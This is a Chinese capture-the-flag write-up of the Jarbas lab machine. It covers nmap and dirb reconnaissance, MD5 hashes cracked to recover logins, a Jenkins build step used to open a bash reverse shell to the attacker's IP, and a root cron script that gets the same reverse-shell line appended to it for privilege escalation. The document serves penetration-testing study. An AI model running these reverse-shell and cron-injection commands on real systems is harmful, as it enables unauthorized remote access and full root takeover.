红队笔记_JARBAS

0x01 主机发现

本机:192.168.63.128

目标机:192.168.63.133

通过nmap进行扫描:

nmap -sn 192.168.63.0/24

0x02 nmap扫描

2.1 端口扫描

nmap --min-rate 10000 -p- 192.168.63.133

Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-18 11:10 CST
Nmap scan report for 192.168.63.133
Host is up (0.0017s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:8B:76:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds

2.2 服务信息扫描

nmap -sT -sV -O -p22,80,3306,8080 192.168.63.133

Nmap scan report for 192.168.63.133
Host is up (0.00041s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:8B:76:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds

nmap -sU -p22,80,3306,8080 192.168.63.133

结果如下:

Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-18 11:16 CST
Nmap scan report for 192.168.63.133
Host is up (0.00030s latency).

PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:8B:76:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds

2.3 漏洞扫描

nmap --script=vuln -p22,80,8080,3306 192.168.63.133

结果如下:

Nmap scan report for 192.168.63.133
Host is up (0.00026s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.63.133
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.63.133:80/
| Form id: wmtb
| Form action: /web/submit
|
| Path: http://192.168.63.133:80/
| Form id:
| Form action: /web/20020720170457/ http://jarbas.com.br:80/user.php
|
| Path: http://192.168.63.133:80/
| Form id:
|_ Form action: /web/20020720170457/ http://jarbas.com.br:80/busca/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.63.133:80/index_arquivos/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/njarb_data/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.63.133:80/index_arquivos/?C=D%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.63.133:80/index_arquivos/?C=S%3bO%3dD%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
8080/tcp open http-proxy
| http-enum:
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:8B:76:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 34.81 seconds

0x03 web渗透

界面如下:

红队笔记_JARBAS

对应8080端口为登录界面

红队笔记_JARBAS

红队笔记_JARBAS

3.1 目录爆破

针对80端口进行目录爆破

dirb http://192.168.63.133

结果如图:


DIRB v2.22

By The Dark Raver

START_TIME: Wed Jan 18 11:25:38 2023
URL_BASE: http://192.168.63.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612

---- Scanning URL: http://192.168.63.133/ ----


END_TIME: Wed Jan 18 11:25:41 2023
DOWNLOADED: 4612 - FOUND: 2

由于无有用信息,可以尝试更换工具或者加入参数

在尝试不同工具后,发现没有结果

那么考虑加入后缀,使用html或者php的后缀扫描

dirb http://192.168.63.133 -X .html,.php

DIRB v2.22

By The Dark Raver

START_TIME: Wed Jan 18 11:28:25 2023
URL_BASE: http://192.168.63.133/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.html,.php) | (.html)(.php) [NUM = 2]


GENERATED WORDS: 4612

---- Scanning URL: http://192.168.63.133/ ----


END_TIME: Wed Jan 18 11:28:31 2023
DOWNLOADED: 9224 - FOUND: 2

上面有一个access.html可以尝试访问

红队笔记_JARBAS

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

可以发现上述为md5

解密后如下:

tiago:italia99

trindade:marianna

eder:vipsu

尝试上述为登录密码

3.2 8080端口登录

通过上述的账号登录,发现eder的可以登录,界面如下:

红队笔记_JARBAS

Jenkins为一个网站框架,可以尝试查看本身的漏洞尝试

3.3 Jenkins渗透

红队笔记_JARBAS

可以尝试新建项目

红队笔记_JARBAS

红队笔记_JARBAS

选择excute shell直接执行shell尝试是否可以利用

红队笔记_JARBAS

/bin/bash -i >& /dev/tcp/192.168.63.128/4444 0>&1

上面命令将shell返回到kali的机器,kali通过监听4444端口进行获取shell

nc -lvnp 4444

然后让上述命令执行,通过build now进行执行

红队笔记_JARBAS

成功获取shell

红队笔记_JARBAS

Jenkins中也有一个正在执行的项目

0x04 Crontab提权

whoami
uname -a
sudo -l
cat /etc/passswd #查看有哪些账号

当前账户:

jenkins

系统版本:

Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

通过查看账号发现有如下账号:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

这里已经获得的shell为部分权限shell,所以尝试获取root权限

所以尝试获取Crontab信息,该文件主要是自动任务相关,所以查看其中的内容

路径为/etc/crontab

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

后面发现有一个脚本5min执行,并且为root权限,所以利用该脚本提权,查看该脚本内容:

#!/bin/bash

rm -rf /var/log/httpd/access_log.txt

内容为删除日志文件,那么我们在里面直接写入我们的脚本内容

echo "/bin/bash -i >& /dev/tcp/192.168.63.128/4443 0>&1" >> /etc/script/CleaningScript.sh

红队笔记_JARBAS

获取了root权限,获取flag

[root@jarbas ~]# cat flag.txt                        
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs 

0x05 总结

  • Jenkins框架渗透
  • 自动任务提权
  • 目录扫描


标签:暂无标签
版权属于:Jtripper 所有,转载请注明文章来源。

本文链接: https://www.jtripperbacaf.com/index.php/archives/60/

上一篇
外挂基础
赞 (2)

评论区

发表评论

34+25=?

暂无评论,要不来一发?

回到顶部